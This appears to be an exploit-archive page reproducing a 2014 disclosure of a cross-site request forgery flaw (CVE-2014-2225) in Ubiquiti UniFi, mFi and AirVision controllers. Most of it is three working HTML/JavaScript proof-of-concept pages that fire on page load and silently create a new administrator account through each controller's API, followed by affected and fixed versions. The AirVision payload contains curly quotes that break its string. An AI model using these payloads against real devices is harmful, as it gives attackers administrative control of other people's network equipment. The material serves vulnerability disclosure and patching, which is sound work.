Skip to content
cyberexploits
webapphardwaretext

Ubiquiti UbiFi / mFi / AirVision - Cross-Site Request Forgery

Ubiquiti UbiFi / mFi / AirVision - Cross-Site Request Forgery

Publié le 2014-07-28

Code source

Épinglé au commit 7eac4c3a2ce5
textplatforms/hardware/webapps/34187.txt7eac4c3a
raw
# Vendor Homepage: (http://www.ubnt.com/)



# Tested on: Kali Linux

-----------------------------------------

Affected Products/Versions:

-----------------------------------------

UniFi Controller v2.4.6

mFi Controller v2.0.15

AirVision Controller v2.1.3

Note: Previous versions may be affected





-----------------

Description:

-----------------

Title: Cross-site Request Forgery (CSRF)

CVE: CVE-2014-2225

CWE: http://cwe.mitre.org/data/definitions/352.html





Detailed writeup: http://sethsec.blogspot.com/2014/07/cve-2014-2225.html

Researcher: Seth Art - @sethsec



---------------

UniFi POC:



---------------



<html>

<head>

<script>

function sendCSRF()

{

var url_base = "https://192.168.0.106:8443/api/add/admin"



var post_data="%7B%22name%22%3A%22csrf%22%2C%22lang%22%3A%22en_US%22%2C%22x_password%22%3A%22csrf%22%7D"



var xmlhttp;

xmlhttp = new XMLHttpRequest();

xmlhttp.open("POST", url_base, true);

xmlhttp.setRequestHeader("Accept","*/*");

xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded;





charset=UTF-8");

xmlhttp.withCredentials= "true";

xmlhttp.send(post_data);

}



</script>

</head>

<body>

<h1>CSRF POC</h1>

Sending CSRF Payload!!!



<body onload="sendCSRF()">



</body>



-------------

mFi POC:

-------------

<html>

<head>

<script>

function sendCSRF()

{

var url_base = "https://192.168.0.106:6443/api/v1.0/add/admin"





var post_data="%7B%22name%22%3A%22csrf%22%2C%22lang%22%3A%22en_US%22%2C%22x_password%22%3A%22csrf%22%7D"



var xmlhttp;

xmlhttp = new XMLHttpRequest();

xmlhttp.open("POST", url_base, true);





xmlhttp.setRequestHeader("Accept","*/*");

xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded;

charset=UTF-8");

xmlhttp.withCredentials= "true";





xmlhttp.send(post_data);

}



</script>

</head>

<body>

<h1>CSRF POC</h1>

Sending CSRF Payload!!!

<body onload="sendCSRF()">

</body>







--------------------



AirVision POC:

--------------------

<html>

<head>

<script>

function sendCSRF()

{

var url_base = "https://192.168.0.106:7443/api/v2.0/admin"





var post_data="{\”name\”:\”csrf\”,\”email\”:\”csrf@gmail.com\”,\”userGroup:\”:\”admin\”,\”x_password\”:\”password\”,\”confirmPassword\”:\”password\”,\”disabled\”:\”false\”}”





var xmlhttp;

xmlhttp = new XMLHttpRequest();

xmlhttp.open("POST", url_base, true);

xmlhttp.setRequestHeader("Accept","*/*");

xmlhttp.setRequestHeader("Content-type","application/plain; charset=UTF-8");





xmlhttp.withCredentials= "true";

xmlhttp.send(post_data);

}



</script>

</head>

<body>

<h1>CSRF POC</h1>

Sending CSRF Payload!!!

<body onload="sendCSRF()">





</body>







-------------

Solution:

-------------

UniFi Controller - Upgrade to UniFi Controller v3.2.1 or greater

mFi Controller - Upgrade to mFi Controller v2.0.24 or greater

AirVision Controller - Upgrade to UniFi Video v3.0.1 or greater (Note:



The application name changed from AirVision to UniFi Video)

Voir sur GitHub